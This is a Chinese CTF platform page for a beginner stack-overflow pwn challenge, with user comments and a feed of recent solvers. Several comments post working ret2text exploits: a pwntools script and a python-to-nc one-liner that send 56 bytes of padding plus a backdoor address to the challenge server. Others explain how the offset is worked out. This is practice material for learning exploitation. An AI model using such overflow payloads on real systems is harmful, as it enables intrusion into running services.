overflowPWN 未解决

分数: 20 金币: 4
题目作者: harry
一  血: blanc
一血奖励: 1金币
解  决: 2347
提  示:
描  述:
pwn2
其  他: 下载
评论
goby 2月前

payload = b'a'*(0x30+8)+p64(get_shell_addr)

回复 0

nirvana。 5月前

在虚拟机中下好文件后,用终端打开下载目录,用unzip file.zip解压文件,ls查看文件,发现解压得到文件名为pwn2,用file pwn2分析,接着用nano exp.py编写Python脚本,最后python3 exp.py执行,得到flag

回复 0

xtk 6月前

from pwn import * io=remote("171.80.2.169",17626) payload=b'a'*(0x30+8)+p64(0x400751) io.recvline("say something?\n") io.sendline(payload) io.interactive()栈溢出覆盖返回地址到后门函数就好了

回复 0

modeng 8月前

这是我的思路,希望能帮到你解题 https://blog.csdn.net/m_de_g/article/details/155747760?spm=1001.2014.3001.5502

回复 1

王安小子 8月前

python3 -c 'print("A"*56 + "\x51\x07\x40\x00\x00\x00\x00\x00")' | nc 171.80.2.169 15170 就ok

回复 0

乌鸦乌鸦乌鸦乌鸦 1年前

为什么答案是56字节,我测出来是40字节

回复 0
scust 1年前

看到main中char s[48]; // [rsp+0h] [rbp-30h] BYREF没?padding = 0x30+8 #epb占用8个字节

回复 1

weiyouzhunze 1年前

栈溢出漏洞利用

回复 0

afag 1年前

0x30+8填充

回复 0

17773146280 1年前

简单的ret2text题目,后门函数地址加上缓冲区长度就可以了

回复 0

YellowZy 1年前

应该是从stack of main里面看到s到r的距离还有8字节的偏移,所以应该是48+8=56字节填充

回复 0

WriteUp

image
Leuslu

9 金币

评分(4)

解题动态

qqqqqwwwwww 攻破了该题 3小时前
李政 攻破了该题 10小时前
uiharuKazari 攻破了该题 1天前
0xValley 攻破了该题 1天前
cnlara 攻破了该题 1天前
Terrenc44 攻破了该题 2天前
28699 攻破了该题 3天前
是隼人 攻破了该题 4天前
liuyun 攻破了该题 4天前
gbvv3 攻破了该题 4天前
wize 攻破了该题 5天前
sbhacker1 攻破了该题 5天前
K0rnZ3bra 攻破了该题 6天前
__tian__ 攻破了该题 7天前
Audience00 攻破了该题 7天前
beyondshij 攻破了该题 7天前
pinus 攻破了该题 8天前
MirrorJon 攻破了该题 8天前
rrlb 攻破了该题 8天前
yohansun 攻破了该题 9天前
问题反馈